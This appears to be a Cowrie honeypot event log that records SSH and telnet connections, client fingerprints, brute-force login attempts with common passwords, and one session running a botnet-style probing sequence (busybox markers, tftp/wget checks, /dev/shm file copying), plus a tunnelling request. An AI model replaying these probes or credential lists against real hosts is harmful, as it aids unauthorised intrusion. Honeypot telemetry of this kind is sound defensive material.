{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:49:37.664785Z","src_ip":"45.88.8.215","session":"2b1a2b04f6db"}
{"eventid":"cowrie.login.success","username":"root","password":"Mandar@123","message":"login attempt [root/Mandar@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:49:40.261430Z","src_ip":"45.88.8.215","session":"2b1a2b04f6db"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:40.790853Z","src_ip":"45.88.8.215","session":"2b1a2b04f6db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10055,"dst_ip":"1.2.3.4","dst_port":23,"session":"a0ae2083622c","protocol":"telnet","message":"New connection: 212.227.235.229:10055 (1.2.3.4:23) [session: a0ae2083622c]","sensor":"my-vps","timestamp":"2025-08-26T10:49:44.060868Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:49:44.864764Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:44.918617Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.174434Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.176231Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.177249Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.178459Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.179178Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.180296Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox QMOKR","message":"CMD: cat /proc/mounts; /bin/busybox QMOKR","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.436792Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox QMOKR","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox QMOKR","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.695437Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox QMOKR","message":"CMD: tftp; wget; /bin/busybox QMOKR","sensor":"my-vps","timestamp":"2025-08-26T10:49:45.952366Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-26T10:49:46.211273Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-26T10:49:46.213563Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"/bin/busybox QMOKR","message":"CMD: /bin/busybox QMOKR","sensor":"my-vps","timestamp":"2025-08-26T10:49:46.468883Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-26T10:49:46.470869Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-26T10:49:46.472450Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-26T10:49:46.473270Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d4722b7c07fbb444a9f0bc891a6a81dd28c4a6987b6202825e6e73d4bb27eb83","size":3550,"shasum":"d4722b7c07fbb444a9f0bc891a6a81dd28c4a6987b6202825e6e73d4bb27eb83","duplicate":false,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/d4722b7c07fbb444a9f0bc891a6a81dd28c4a6987b6202825e6e73d4bb27eb83 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:46.474722Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.session.closed","duration":2.4199111461639404,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:46.480871Z","src_ip":"212.227.235.229","session":"a0ae2083622c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":49992,"dst_ip":"1.2.3.4","dst_port":22,"session":"98d36c6664d9","protocol":"ssh","message":"New connection: 196.251.86.249:49992 (1.2.3.4:22) [session: 98d36c6664d9]","sensor":"my-vps","timestamp":"2025-08-26T10:49:59.996556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:50:00.650346Z","src_ip":"196.251.86.249","session":"98d36c6664d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:50:00.651071Z","src_ip":"196.251.86.249","session":"98d36c6664d9"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwer1234","message":"login attempt [user/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-26T10:50:02.601979Z","src_ip":"196.251.86.249","session":"98d36c6664d9"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:50:04.063254Z","src_ip":"196.251.86.249","session":"98d36c6664d9"}
{"eventid":"cowrie.session.closed","duration":"59.1","message":"Connection lost after 59.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:50:18.452567Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":50280,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9a653f6d9bb","protocol":"ssh","message":"New connection: 196.251.86.249:50280 (1.2.3.4:22) [session: d9a653f6d9bb]","sensor":"my-vps","timestamp":"2025-08-26T10:51:01.460559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:51:01.916523Z","src_ip":"196.251.86.249","session":"d9a653f6d9bb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:51:01.928653Z","src_ip":"196.251.86.249","session":"d9a653f6d9bb"}
{"eventid":"cowrie.login.failed","username":"user","password":"password123","message":"login attempt [user/password123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:51:03.756920Z","src_ip":"196.251.86.249","session":"d9a653f6d9bb"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:51:06.459512Z","src_ip":"196.251.86.249","session":"d9a653f6d9bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31097,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0db84ca20dd","protocol":"ssh","message":"New connection: 212.227.235.229:31097 (1.2.3.4:22) [session: c0db84ca20dd]","sensor":"my-vps","timestamp":"2025-08-26T10:51:32.802054Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:51:32.803995Z","src_ip":"212.227.235.229","session":"c0db84ca20dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31387,"dst_ip":"1.2.3.4","dst_port":22,"session":"b934ae66851a","protocol":"ssh","message":"New connection: 212.227.235.229:31387 (1.2.3.4:22) [session: b934ae66851a]","sensor":"my-vps","timestamp":"2025-08-26T10:51:32.978777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:51:32.979717Z","src_ip":"212.227.235.229","session":"b934ae66851a"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T10:51:33.136486Z","src_ip":"212.227.235.229","session":"b934ae66851a"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:51:33.608315Z","src_ip":"212.227.235.229","session":"b934ae66851a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T10:51:33.766634Z","session":"b934ae66851a"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":50734,"dst_ip":"1.2.3.4","dst_port":22,"session":"38e4c828e7b6","protocol":"ssh","message":"New connection: 196.251.86.249:50734 (1.2.3.4:22) [session: 38e4c828e7b6]","sensor":"my-vps","timestamp":"2025-08-26T10:52:03.068638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:52:03.572712Z","src_ip":"196.251.86.249","session":"38e4c828e7b6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:52:03.573407Z","src_ip":"196.251.86.249","session":"38e4c828e7b6"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwerty123456","message":"login attempt [user/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-26T10:52:05.364484Z","src_ip":"196.251.86.249","session":"38e4c828e7b6"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:52:07.081400Z","src_ip":"196.251.86.249","session":"38e4c828e7b6"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:52:42.978891Z","src_ip":"212.227.235.229","session":"b934ae66851a"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":42075,"dst_ip":"1.2.3.4","dst_port":22,"session":"edc884cf77b9","protocol":"ssh","message":"New connection: 80.94.95.112:42075 (1.2.3.4:22) [session: edc884cf77b9]","sensor":"my-vps","timestamp":"2025-08-26T10:52:46.884034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T10:52:46.885051Z","src_ip":"80.94.95.112","session":"edc884cf77b9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T10:52:46.916611Z","src_ip":"80.94.95.112","session":"edc884cf77b9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sarina","message":"login attempt [admin/sarina] failed","sensor":"my-vps","timestamp":"2025-08-26T10:52:47.124510Z","src_ip":"80.94.95.112","session":"edc884cf77b9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sanjose","message":"login attempt [admin/sanjose] failed","sensor":"my-vps","timestamp":"2025-08-26T10:52:48.157259Z","src_ip":"80.94.95.112","session":"edc884cf77b9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"samue","message":"login attempt [admin/samue] failed","sensor":"my-vps","timestamp":"2025-08-26T10:52:49.190300Z","src_ip":"80.94.95.112","session":"edc884cf77b9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sage","message":"login attempt [admin/sage] failed","sensor":"my-vps","timestamp":"2025-08-26T10:52:50.223099Z","src_ip":"80.94.95.112","session":"edc884cf77b9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"saddle","message":"login attempt [admin/saddle] failed","sensor":"my-vps","timestamp":"2025-08-26T10:52:51.255843Z","src_ip":"80.94.95.112","session":"edc884cf77b9"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:52:52.288876Z","src_ip":"80.94.95.112","session":"edc884cf77b9"}
{"eventid":"cowrie.session.connect","src_ip":"175.110.65.134","src_port":57795,"dst_ip":"1.2.3.4","dst_port":22,"session":"a815377fbeec","protocol":"ssh","message":"New connection: 175.110.65.134:57795 (1.2.3.4:22) [session: a815377fbeec]","sensor":"my-vps","timestamp":"2025-08-26T10:52:55.110176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-26T10:52:55.110962Z","src_ip":"175.110.65.134","session":"a815377fbeec"}
{"eventid":"cowrie.client.kex","hassh":"14b2ddda386a4d1006108ccd231b42fc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 14b2ddda386a4d1006108ccd231b42fc","sensor":"my-vps","timestamp":"2025-08-26T10:52:55.137862Z","src_ip":"175.110.65.134","session":"a815377fbeec"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Password123","message":"login attempt [admin/Password123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:52:55.271741Z","src_ip":"175.110.65.134","session":"a815377fbeec"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:52:56.335329Z","src_ip":"175.110.65.134","session":"a815377fbeec"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":50948,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5862ddf6f47","protocol":"ssh","message":"New connection: 196.251.86.249:50948 (1.2.3.4:22) [session: b5862ddf6f47]","sensor":"my-vps","timestamp":"2025-08-26T10:53:05.756260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:53:06.651850Z","src_ip":"196.251.86.249","session":"b5862ddf6f47"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcf